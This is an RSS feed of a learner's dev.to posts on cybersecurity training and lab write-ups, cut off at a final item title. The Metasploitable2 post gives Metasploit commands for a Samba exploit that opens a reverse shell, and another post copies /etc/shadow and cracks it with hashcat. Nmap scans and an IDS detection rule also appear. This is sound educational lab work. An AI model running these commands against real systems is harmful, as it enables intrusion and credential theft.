<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Seif Eldien Ahmad Mohammad</title>
    <description>The latest articles on DEV Community by Seif Eldien Ahmad Mohammad (@seifeldienahmad).</description>
    <link>https://dev.to/seifeldienahmad</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3084495%2F9825aecb-eac0-4d2c-88b7-5ec27271ca61.jpeg</url>
      <title>DEV Community: Seif Eldien Ahmad Mohammad</title>
      <link>https://dev.to/seifeldienahmad</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/seifeldienahmad"/>
    <language>en</language>
    <item>
      <title>IT Technical Support program at the National Telecommunication Institute (NTI)</title>
      <dc:creator>Seif Eldien Ahmad Mohammad</dc:creator>
      <pubDate>Mon, 09 Feb 2026 17:18:24 +0000</pubDate>
      <link>https://dev.to/seifeldienahmad/it-technical-support-program-at-the-national-telecommunication-institute-nti-20g2</link>
      <guid>https://dev.to/seifeldienahmad/it-technical-support-program-at-the-national-telecommunication-institute-nti-20g2</guid>
      <description>&lt;p&gt;I’ve just completed an intensive 120-hour Professional Skills &amp;amp; IT Technical Support program at the &lt;strong&gt;National Telecommunication Institute (NTI)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This journey strengthened both my technical foundation and professional skills, with a strong focus on areas directly supporting my path in cybersecurity and red teaming:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technical &amp;amp; Security Foundations:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Network Protocols &amp;amp; Architecture&lt;/li&gt;
&lt;li&gt;Windows Server Installation &amp;amp; Configuration&lt;/li&gt;
&lt;li&gt;Network Security Concepts &amp;amp; Threat Recognition&lt;/li&gt;
&lt;li&gt;Data Communications &amp;amp; Network Services&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Professional &amp;amp; Leadership Skills:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Critical Thinking &amp;amp; Problem Solving&lt;/li&gt;
&lt;li&gt;Negotiation &amp;amp; Conflict Resolution&lt;/li&gt;
&lt;li&gt;Time Management &amp;amp; Business Writing&lt;/li&gt;
&lt;li&gt;Interviewing Skills &amp;amp; CV Preparation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Grateful to the instructors who guided me through this experience. This program added real-world depth to my infrastructure and security knowledge — and I’m excited to keep building toward my future in cybersecurity&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>it</category>
      <category>windowsserver</category>
      <category>professionalgrowth</category>
    </item>
    <item>
      <title>Packet-Level Security: How to Monitor and Detect Network Attacks with Nmap and Wireshark</title>
      <dc:creator>Seif Eldien Ahmad Mohammad</dc:creator>
      <pubDate>Mon, 13 Oct 2025 17:25:36 +0000</pubDate>
      <link>https://dev.to/seifeldienahmad/packet-level-security-how-to-monitor-and-detect-network-attacks-with-nmap-and-wireshark-476o</link>
      <guid>https://dev.to/seifeldienahmad/packet-level-security-how-to-monitor-and-detect-network-attacks-with-nmap-and-wireshark-476o</guid>
      <description>&lt;p&gt;&lt;strong&gt;A Step-by-Step Lab for Understanding SYN Scans, Session Flow, and Implementing IDS Logic&lt;/strong&gt;&lt;br&gt;
Introduction&lt;/p&gt;

&lt;p&gt;Network security is fundamentally a battle fought at the packet level. This write-up details a hands-on lab designed to move beyond theory and directly observe the signatures of network activity—both normal and potentially malicious—using powerful tools like Nmap, tcpdump, and Wireshark. Our objective was simple: simulate a basic scan and normal traffic, analyze the results, and lay the groundwork for effective Intrusion Detection System (IDS) rule creation.&lt;/p&gt;

&lt;p&gt;Lab Setup and Execution&lt;/p&gt;

&lt;p&gt;Our setup involved a Kali Linux machine acting as both the attacker and the monitor, targeting a server at 192.168.1.16.&lt;/p&gt;

&lt;p&gt;Execution Steps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Start Packet Capture (The Monitor):
We initiated a raw capture on the monitor interface to ensure we didn't miss a single frame. 
   &lt;code&gt;tcpdump -i wlan0 -w capture.pcap&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Run Nmap Scan (The Attack Simulation):
 A stealthy SYN scan was performed across common ports. The -sS flag sends SYN packets but does not complete the handshake, making it harder to log but easy to detect at the packet level. 
&lt;code&gt;nmap -sS -p1-1000 -T4 -oN nmap_scan.txt 192.168.1.16&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Generate Normal Traffic:
To establish a baseline, we generated legitimate web traffic (HTTP/HTTPS) and started an SSH session (ssh &lt;a href="mailto:user@192.168.1.16"&gt;user@192.168.1.16&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;Testing for Anomalies:
Small, repeated requests were sent to generate a pattern that simulates rapid interaction or an aggressive test condition.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Results and PCAP Analysis (Wireshark Deep Dive)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The Nmap results confirmed open ports 22, 80, and 443. However, the real insights came from the capture.pcap file analyzed in Wireshark.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Traffic Type    Wireshark Observation   Security Implication
Nmap Scan    Numerous SYN packets without corresponding ACK flags.  High Confidence Scan: The attacker is probing without completing the TCP handshake, a classic SYN scan.
HTTPS Traffic   TLS Client Hello from 192.168.1.13 to 192.168.1.16. Normal Encrypted Session Start: Expected handshake for secure web traffic.
SSH Session End A RST, ACK flag observed from the server (port 22) to the client port.  Abrupt Connection Close: Indicates the session was forcefully ended (e.g., terminal closed, network error, or firewall reset).
Large Data  Frames of 1460 / 1514 bytes.    Normal Data Flow: Standard large TCP segments (payloads) being transferred.
Test Conditions A few TLS Handshake Failure events. Anomaly: May indicate a configuration error (cipher mismatch) or aggressive testing environment.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Designing a Simple IDS Rule&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Based on the SYN scan observation, we can create a foundational rule for an IDS like Suricata or Snort to detect the initial signs of a SYN flood or aggressive port scan:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;alert tcp any any -&amp;gt; $HOME_NET any (msg:"Possible Aggressive SYN Scan Detected"; flags:S; threshold:type threshold, track by_src, count 15, seconds 5; sid:1000001; rev:1;)&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Interpretation: If any single source IP (track by_src) sends 15 or more SYN packets (flags:S) in a 5-second interval, trigger this alert. This provides immediate, low-false-positive detection for scanning activity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mitigation and Defense&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Effective network security relies on multiple layers:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt; &lt;strong&gt;IDS/IPS&lt;/strong&gt;: Deploy Suricata or Snort and constantly tune custom rules.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Segmentation (VLANs)&lt;/strong&gt;: Separate your development/test environment from production networks.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Firewall Hardening&lt;/strong&gt;: Implement explicit DENY ALL rules, only allowing required ports (22, 80, 443, etc.).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rate Limiting&lt;/strong&gt;: Configure firewalls or load balancers to limit the number of new SYN connections per source IP (e.g., using SYN cookies).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Centralized Logging (SIEM)&lt;/strong&gt;: Ship all IDS alerts and system logs to a central location for correlation and long-term analysis.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;This lab demonstrated that the true nature of an attack is revealed in the network packets. By understanding TCP/IP flags and protocol sequences, security professionals can write precise detection rules and build robust, proactive defense strategies.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

</description>
      <category>cybersecurity</category>
      <category>defense</category>
      <category>handson</category>
      <category>internship</category>
    </item>
    <item>
      <title>WPA2 Lab Walkthrough — Capture, Analyze, and Harden (Simulated Only)</title>
      <dc:creator>Seif Eldien Ahmad Mohammad</dc:creator>
      <pubDate>Fri, 10 Oct 2025 17:28:40 +0000</pubDate>
      <link>https://dev.to/seifeldienahmad/wpa2-lab-walkthrough-capture-analyze-and-harden-simulated-only-2506</link>
      <guid>https://dev.to/seifeldienahmad/wpa2-lab-walkthrough-capture-analyze-and-harden-simulated-only-2506</guid>
      <description>&lt;p&gt;I ran a simulated WPA2 lab to better understand handshake captures and offline cracking implications. This post summarizes the non-actionable workflow, observations, and hardening guidance.&lt;/p&gt;

&lt;p&gt;Summary:&lt;/p&gt;

&lt;p&gt;Scope: simulated lab — AP and client under my control.&lt;/p&gt;

&lt;p&gt;Objective: capture a WPA2 4-way handshake, analyze it, and test dictionary-based offline recovery to measure passphrase strength.&lt;/p&gt;

&lt;p&gt;Observations: short or common passphrases were quickly tested; longer multi-word passphrases offered meaningful resistance.&lt;/p&gt;

&lt;p&gt;Recommended hardening: migrate to WPA3 where possible, adopt WPA2/WPA3-Enterprise for organizations, disable WPS, require AES/CCMP, segment networks, and maintain firmware/patch hygiene.&lt;/p&gt;

&lt;p&gt;If you want a sanitized checklist or the repository with documentation and screenshot placeholders (no raw captures or keys), reply and I’ll share the repo link.&lt;/p&gt;

</description>
      <category>security</category>
      <category>wifi</category>
      <category>wpa2</category>
      <category>handson</category>
    </item>
    <item>
      <title>How I safely tested a TurnKey CCTV appliance (lab workflow + mitigation playbook)</title>
      <dc:creator>Seif Eldien Ahmad Mohammad</dc:creator>
      <pubDate>Thu, 09 Oct 2025 22:31:07 +0000</pubDate>
      <link>https://dev.to/seifeldienahmad/how-i-safely-tested-a-turnkey-cctv-appliance-lab-workflow-mitigation-playbook-141j</link>
      <guid>https://dev.to/seifeldienahmad/how-i-safely-tested-a-turnkey-cctv-appliance-lab-workflow-mitigation-playbook-141j</guid>
      <description>&lt;p&gt;I deployed a TurnKey CCTV appliance in a host-only VM, discovered an outdated SSH banner that mapped to CVE-2024-6387, validated impact using a public PoC in the lab only, and then applied prioritized mitigations: rebuild, patch, SSH hardening, network segmentation, and monitoring. This post gives a practical checklist and a minimal playbook for safe testing and remediation.&lt;/p&gt;

&lt;p&gt;Checklist (lab safety first)&lt;/p&gt;

&lt;p&gt;Host-only or LAN-segment VM network.&lt;/p&gt;

&lt;p&gt;Snapshot the clean image before any tests.&lt;/p&gt;

&lt;p&gt;Evidence folder: store nmap outputs, screenshots, and /var/log entries.&lt;/p&gt;

&lt;p&gt;Use isolated test files (video samples) rather than production feeds.&lt;/p&gt;

&lt;p&gt;Discovery (safe)&lt;/p&gt;

&lt;p&gt;Use nmap -sV to detect service banners.&lt;/p&gt;

&lt;p&gt;Compare version strings to CVE databases and vendor advisories.&lt;/p&gt;

&lt;p&gt;Don’t perform intrusive scans or exploits outside the scoped, authorized lab.&lt;/p&gt;

&lt;p&gt;Validation (lab only)&lt;/p&gt;

&lt;p&gt;If you find a public PoC, run it only in a disposable, offline VM you control.&lt;/p&gt;

&lt;p&gt;Preserve VM snapshots and logs before and after validation.&lt;/p&gt;

&lt;p&gt;Do not publish exploit code or step-by-step attack instructions.&lt;/p&gt;

&lt;p&gt;Minimal mitigation playbook (immediate priorities)&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Rebuild from trusted image and apply all OS/security updates.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;SSH hardening (short checklist):&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;PermitRootLogin no&lt;/p&gt;

&lt;p&gt;PasswordAuthentication no (use key auth)&lt;/p&gt;

&lt;p&gt;UsePAM yes / AllowUsers / AllowGroups to restrict access&lt;/p&gt;

&lt;p&gt;Deploy fail2ban or connection rate limiting&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Network segmentation: Put all IoT/CCTV devices on a dedicated VLAN with strict ACLs. Management only via VPN/jump host.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Logging &amp;amp; detection: Ship logs to a central host, enable AIDE, and monitor for suspicious activity.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Credentials &amp;amp; secrets: Rotate secrets, remove default accounts, and use a vault for keys.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Repo &amp;amp; artifacts&lt;br&gt;
I maintain a repo with:&lt;/p&gt;

&lt;p&gt;A sanitized incident report template.&lt;/p&gt;

&lt;p&gt;Lab setup checklist.&lt;/p&gt;

&lt;p&gt;Safe scripts to collect logs and snapshot instructions.&lt;br&gt;
(Repository contains no exploit code — only templates and defensive artifacts.)&lt;/p&gt;

&lt;p&gt;Wrap up&lt;br&gt;
When you test IoT/CCTV devices: plan, isolate, snapshot, document, and revert. If you want the checklist or the repo link, send me a DM.&lt;/p&gt;

</description>
      <category>security</category>
      <category>devops</category>
      <category>iot</category>
      <category>infosec</category>
    </item>
    <item>
      <title>Website Hacking Project: From Exploitation to Mitigation</title>
      <dc:creator>Seif Eldien Ahmad Mohammad</dc:creator>
      <pubDate>Thu, 25 Sep 2025 16:33:04 +0000</pubDate>
      <link>https://dev.to/seifeldienahmad/website-hacking-project-from-exploitation-to-mitigation-1e40</link>
      <guid>https://dev.to/seifeldienahmad/website-hacking-project-from-exploitation-to-mitigation-1e40</guid>
      <description>&lt;p&gt;During my internship, I had the opportunity to work on a Website Hacking Project. The main goal was to understand how attackers exploit vulnerabilities in web applications, but more importantly, how defenders can implement strategies to reduce the risk of these attacks.&lt;/p&gt;

&lt;p&gt;This project gave me a hands-on experience that connected both sides of cybersecurity: offense and defense.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Vulnerabilities Explored&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;🔹 SQL Injection&lt;br&gt;
I practiced injecting malicious SQL queries into input fields to gain unauthorized access to database content. This helped me understand how poor query handling can compromise sensitive information.&lt;/p&gt;

&lt;p&gt;🔹 Command Injection&lt;br&gt;
Through command injection, I learned how unvalidated user inputs could be used to execute system-level commands, potentially giving attackers deeper access to the server.&lt;/p&gt;

&lt;p&gt;🔹 Login Bypassing&lt;br&gt;
I explored techniques to bypass login forms by exploiting weak authentication mechanisms. This showed how fragile security can be if user validation isn’t properly enforced.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Mitigation Methods Learned&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Studying vulnerabilities is only half of the lesson — knowing how to prevent them is equally important.&lt;/p&gt;

&lt;p&gt;🛡️ SQL Query Parameters&lt;br&gt;
Using prepared statements and parameterized queries prevents malicious SQL injection attempts by ensuring input is treated as data, not code.&lt;/p&gt;

&lt;p&gt;🛡️ Restricting Shell Privileges&lt;br&gt;
By applying the principle of least privilege, even if a shell is compromised, attackers won’t gain full system control.&lt;/p&gt;

&lt;p&gt;🛡️ Secure Configurations&lt;br&gt;
Simple misconfigurations can open big doors to attackers. I practiced reviewing configurations to make sure systems are hardened against common attack vectors.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Key Takeaways&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Offensive skills help you think like an attacker and anticipate their moves.&lt;/p&gt;

&lt;p&gt;Defensive practices ensure you can build resilience against real-world attacks.&lt;/p&gt;

&lt;p&gt;Combining both perspectives provides a balanced mindset that is critical in red teaming.&lt;/p&gt;

&lt;p&gt;Conclusion&lt;/p&gt;

&lt;p&gt;This project was a strong reminder that cybersecurity is not just about finding vulnerabilities, but also about securing systems once the cracks are revealed.&lt;/p&gt;

&lt;p&gt;It pushed me to see security as a cycle of continuous learning:&lt;br&gt;
👉 Identify weaknesses&lt;br&gt;
👉 Exploit ethically to understand them&lt;br&gt;
👉 Mitigate to strengthen defenses&lt;/p&gt;

&lt;p&gt;I’m excited to carry these lessons forward and continue building skills in both offensive and defensive security.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>redteaming</category>
      <category>webexploits</category>
      <category>sqlinjection</category>
    </item>
    <item>
      <title>Hands-On Exploitation with Metasploitable2: From Scanning to Mitigation</title>
      <dc:creator>Seif Eldien Ahmad Mohammad</dc:creator>
      <pubDate>Sat, 13 Sep 2025 12:06:29 +0000</pubDate>
      <link>https://dev.to/seifeldienahmad/hands-on-exploitation-with-metasploitable2-from-scanning-to-mitigation-2h5k</link>
      <guid>https://dev.to/seifeldienahmad/hands-on-exploitation-with-metasploitable2-from-scanning-to-mitigation-2h5k</guid>
      <description>&lt;p&gt;Intro&lt;br&gt;
During my second internship project I worked through a practical penetration testing workflow using Kali Linux and Metasploitable2. The goal: practice reconnaissance, exploitation, and writing remediation recommendations. Below I document the steps I followed and the lessons learned.&lt;/p&gt;

&lt;p&gt;Environment&lt;/p&gt;

&lt;p&gt;Attack box: Kali Linux&lt;/p&gt;

&lt;p&gt;Target: Metasploitable2 (VM)&lt;/p&gt;

&lt;p&gt;1) Recon &amp;amp; Scanning&lt;/p&gt;

&lt;p&gt;I started with broad and focused scans using &lt;code&gt;nmap&lt;/code&gt;:&lt;br&gt;
&lt;code&gt;sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x&lt;/code&gt;&lt;br&gt;
This revealed a number of services; the ones I focused on were:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;21/tcp → vsftpd 2.3.4 (banner only; service was broken/unresponsive)&lt;/li&gt;
&lt;li&gt;445/tcp → Samba smbd 3.x
2) Enumeration &amp;amp; Triage&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After collecting service/version info I used searchsploit and manual checks:&lt;br&gt;
&lt;code&gt;&lt;br&gt;
searchsploit --nmap scans/target.xml&lt;br&gt;
searchsploit vsftpd 2.3.4&lt;br&gt;
searchsploit samba 3.0.20&lt;br&gt;
&lt;/code&gt;&lt;br&gt;
This gave me candidate exploits to test. vsftpd backdoor (CVE-2011-2523) was on the list, as was the Samba username-map script exploit (CVE-2007-2447).&lt;br&gt;
3) Exploitation&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;vsftpd (CVE-2011-2523): Attempted with Metasploit module exploit/unix/ftp/vsftpd_234_backdoor. The Nmap banner reported vsftpd 2.3.4, but manual connection attempts timed out and the service was not fully responsive—exploit did not yield a session.&lt;/li&gt;
&lt;li&gt;Samba (CVE-2007-2447): Used Metasploit:
&lt;code&gt;
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.x.x
set RPORT 445
set payload cmd/unix/reverse
set LHOST &amp;lt;kali-ip&amp;gt;
set LPORT 4444
exploit
&lt;/code&gt;
This produced a working remote shell.
4) Post-Exploitation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;With an interactive shell I validated privileges:&lt;br&gt;
&lt;code&gt;&lt;br&gt;
id&lt;br&gt;
uname -a&lt;br&gt;
&lt;/code&gt;&lt;br&gt;
I documented evidence (screenshots, commands, outputs) and prepared remediation notes.&lt;br&gt;
5) Mitigation Summary:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Continuous vulnerability scanning and asset inventory.&lt;/li&gt;
&lt;li&gt;Patch management — update Samba and other services.&lt;/li&gt;
&lt;li&gt;Network filtering (block/limit access to ports 445, 21).&lt;/li&gt;
&lt;li&gt;Disable unused services and guest/anonymous access.&lt;/li&gt;
&lt;li&gt;Apply least privilege on shares and accounts.&lt;/li&gt;
&lt;li&gt;Network segmentation and logging/monitoring.&lt;/li&gt;
&lt;li&gt;Incident response readiness.
Result: Achieved remote shell on Metasploitable2 via Samba exploit, documented findings, and produced a mitigation plan. Practically implementing scanning → exploitation → mitigation reinforced how important remediation and detection are after proving an attack path.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If anyone wants the full notes or the step-by-step commands, I can share the repo with scripts and example outputs.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>redteaming</category>
      <category>internship</category>
      <category>handsonproject</category>
    </item>
    <item>
      <title>Password Cracking Project #1 – From Privilege Escalation to Hashcat</title>
      <dc:creator>Seif Eldien Ahmad Mohammad</dc:creator>
      <pubDate>Sat, 06 Sep 2025 12:27:28 +0000</pubDate>
      <link>https://dev.to/seifeldienahmad/password-cracking-project-1-from-privilege-escalation-to-hashcat-1k90</link>
      <guid>https://dev.to/seifeldienahmad/password-cracking-project-1-from-privilege-escalation-to-hashcat-1k90</guid>
      <description>&lt;p&gt;🔹 Objective:&lt;br&gt;
Learn and apply the end-to-end process of password cracking on Metasploitable2.&lt;/p&gt;

&lt;p&gt;🔹 Steps Taken:&lt;br&gt;
``&lt;/p&gt;

&lt;h1&gt;
  
  
  1. Dump shadow and passwd files
&lt;/h1&gt;

&lt;p&gt;scp msfadmin@:/etc/passwd ./passwd&lt;br&gt;
scp msfadmin@:/etc/shadow ./shadow&lt;/p&gt;

&lt;h1&gt;
  
  
  2. Combine them into a hash file
&lt;/h1&gt;

&lt;p&gt;unshadow passwd shadow &amp;gt; combined.txt&lt;/p&gt;

&lt;h1&gt;
  
  
  3. Run Hashcat against the hashes
&lt;/h1&gt;

&lt;p&gt;hashcat -m 500 -a 0 combined.txt /usr/share/wordlists/rockyou.txt&lt;br&gt;
``&lt;br&gt;
🔹 Outcome:&lt;/p&gt;

&lt;p&gt;Extracted hashes successfully.&lt;/p&gt;

&lt;p&gt;Attempted cracking with Hashcat.&lt;/p&gt;

&lt;p&gt;Root password did not crack with the default wordlist.&lt;/p&gt;

&lt;p&gt;🔹 Lessons Learned:&lt;/p&gt;

&lt;p&gt;Password cracking requires strong wordlists and sometimes brute-force.&lt;/p&gt;

&lt;p&gt;The workflow matters more than the result.&lt;/p&gt;

&lt;p&gt;Defenders should always enforce strong passwords and modern hashing algorithms.&lt;/p&gt;

&lt;p&gt;💡 Next Steps:&lt;/p&gt;

&lt;p&gt;Experiment with custom wordlists.&lt;/p&gt;

&lt;p&gt;Try brute-force methods.&lt;/p&gt;

&lt;p&gt;Move to the next Red Teaming challenge (DVWA SQL injection).&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>offsec</category>
      <category>redteam</category>
      <category>internship</category>
    </item>
    <item>
      <title>My Next Step in Cybersecurity: Internship at Young Cyber Knights Foundation</title>
      <dc:creator>Seif Eldien Ahmad Mohammad</dc:creator>
      <pubDate>Fri, 05 Sep 2025 13:10:15 +0000</pubDate>
      <link>https://dev.to/seifeldienahmad/my-next-step-in-cybersecurity-internship-at-young-cyber-knights-foundation-3i1g</link>
      <guid>https://dev.to/seifeldienahmad/my-next-step-in-cybersecurity-internship-at-young-cyber-knights-foundation-3i1g</guid>
      <description>&lt;p&gt;I’m thrilled to share that I’ve been accepted for an internship with Young Cyber Knights Foundation. This opportunity represents an important step in my career path toward becoming a Red Teamer.&lt;/p&gt;

&lt;p&gt;Through this internship, I aim to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Strengthen my penetration testing skills by applying them in real-world scenarios.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Gain practical knowledge in attack simulation techniques and how they are used in red teaming engagements.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Learn effective mitigation strategies to better understand how organizations can defend against these attacks.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This program will not only help me grow technically but also give me a broader perspective on the balance between offense and defense in cybersecurity. I believe this dual perspective is essential for anyone pursuing a career in offensive security.&lt;/p&gt;

&lt;p&gt;I’m grateful for this chance to learn, improve, and contribute to the cybersecurity community. Looking forward to what’s next!&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>redteam</category>
      <category>penetrationtesting</category>
      <category>internship</category>
    </item>
    <item>
      <title>I’m glad to share that I have successfully completed the main technical track of the Cybersecurity Academy scholarship</title>
      <dc:creator>Seif Eldien Ahmad Mohammad</dc:creator>
      <pubDate>Tue, 26 Aug 2025 20:34:31 +0000</pubDate>
      <link>https://dev.to/seifeldienahmad/im-glad-to-share-that-i-have-successfully-completed-the-main-technical-track-of-the-cybersecurity-3d2</link>
      <guid>https://dev.to/seifeldienahmad/im-glad-to-share-that-i-have-successfully-completed-the-main-technical-track-of-the-cybersecurity-3d2</guid>
      <description>&lt;p&gt;Today I’m glad to share that I have successfully completed the main technical track of the Cybersecurity Academy scholarship offered by the National Telecommunication Institute (NTI) National Telecommunication Institute - المعهد القومي للاتصالات&lt;/p&gt;

&lt;p&gt;Throughout this journey, I was introduced to and practiced several essential areas in cybersecurity, including:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Network &amp;amp; Network Security&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Introduction to Cybersecurity Threats (including NIST Cybersecurity Framework)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Vulnerability Assessment (categorization, methodologies, Nessus &amp;amp; OpenVAS)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Web Application Vulnerability Scanning (OWASP Top 10, OWASP ZAP, Burp Suite)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;WordPress Security Hardening (Linux basics, architecture, vulnerabilities, mitigations, brute force attacks)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Basic Penetration Testing Concepts&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Cloud Security Auditing (fundamentals, threat analysis, tools such as ScoutSuite &amp;amp; Prowler, and hands-on auditing)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Log Analysis &amp;amp; Threat Hunting&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Cybersecurity Awareness Campaigns&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This program gave me solid foundational knowledge in both defensive and offensive security aspects, and I’m really grateful for the opportunity to learn and practice these skills.&lt;/p&gt;

&lt;p&gt;📌 There are still two upcoming sessions focusing on freelancing opportunities in the cybersecurity field, which I’m excited to attend.&lt;/p&gt;

&lt;p&gt;Looking forward to applying what I’ve learned in real-world scenarios and continuing my journey towards becoming a Red Teamer.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>ministryofcommunications</category>
      <category>redteaming</category>
      <category>learningjourney</category>
    </item>
    <item>
      <title>Python Essentials 1 – Completed! 🐍✨</title>
      <dc:creator>Seif Eldien Ahmad Mohammad</dc:creator>
      <pubDate>Thu, 07 Aug 2025 22:55:12 +0000</pubDate>
      <link>https://dev.to/seifeldienahmad/python-essentials-1-completed-1n25</link>
      <guid>https://dev.to/seifeldienahmad/python-essentials-1-completed-1n25</guid>
      <description>&lt;p&gt;Just wrapped up &lt;em&gt;Python Essentials 1&lt;/em&gt; via Cisco Networking Academy — and wow, what a ride!&lt;br&gt;&lt;br&gt;
No prior coding experience? Same here — this course took me from zero to confidently writing, debugging, and executing Python scripts. Learned how to think algorithmically, tackle problems logically, and follow best practices for clean code.&lt;/p&gt;

&lt;p&gt;Next step: pursuing the &lt;em&gt;PCEP&lt;/em&gt; certification. Feeling inspired and ready to dive deeper into software dev, data analysis, and automation. Let’s code and grow together!&lt;/p&gt;

</description>
      <category>python</category>
      <category>programming</category>
      <category>cisco</category>
      <category>certification</category>
    </item>
    <item>
      <title>🚀 Learning Update: Bash, Python, and Cybersecurity Training!</title>
      <dc:creator>Seif Eldien Ahmad Mohammad</dc:creator>
      <pubDate>Mon, 04 Aug 2025 16:21:53 +0000</pubDate>
      <link>https://dev.to/seifeldienahmad/learning-update-bash-python-and-cybersecurity-training-51nh</link>
      <guid>https://dev.to/seifeldienahmad/learning-update-bash-python-and-cybersecurity-training-51nh</guid>
      <description>&lt;p&gt;Hello everyone! 👋 &lt;br&gt;
Just wanted to share some quick updates from my learning journey:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;✅ I’ve reached the &lt;em&gt;for &amp;amp; while loops&lt;/em&gt; section in Python – still basic but getting stronger every day.&lt;/li&gt;
&lt;li&gt;🖥️ Practicing &lt;em&gt;Linux sysadmin&lt;/em&gt; on my personal machine:

&lt;ul&gt;
&lt;li&gt;Backup automation
&lt;/li&gt;
&lt;li&gt;Network monitoring scripts
&lt;/li&gt;
&lt;li&gt;All pushed to GitHub right here 👇
&lt;a href="https://github.com/SeifEldienAhmad/BashScripts" rel="noopener noreferrer"&gt;My BashScripts Repo&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;💥 Bonus: Tomorrow I’m kicking off a new cybersecurity training program from Egypt’s Ministry of Communications – excited to dive deeper into real-world cyber skills!  &lt;/p&gt;




&lt;p&gt;&lt;em&gt;📌 SEO-friendly Tags:&lt;/em&gt;&lt;br&gt;&lt;br&gt;
Seif Eldien Ahmad Mohammad, Seif Eldein, Cybersecurity Trainee, Python Beginner, Linux Admin Scripts, Red Team Egypt&lt;/p&gt;

&lt;p&gt;Thanks for reading! Feel free to connect or share your current projects.&lt;/p&gt;

</description>
      <category>programming</category>
      <category>python</category>
      <category>cybersecurity</category>
      <category>linux</category>
    </item>
    <item>
      <title>🧠 My Personal Bash Scripts Repository on GitHub</title>
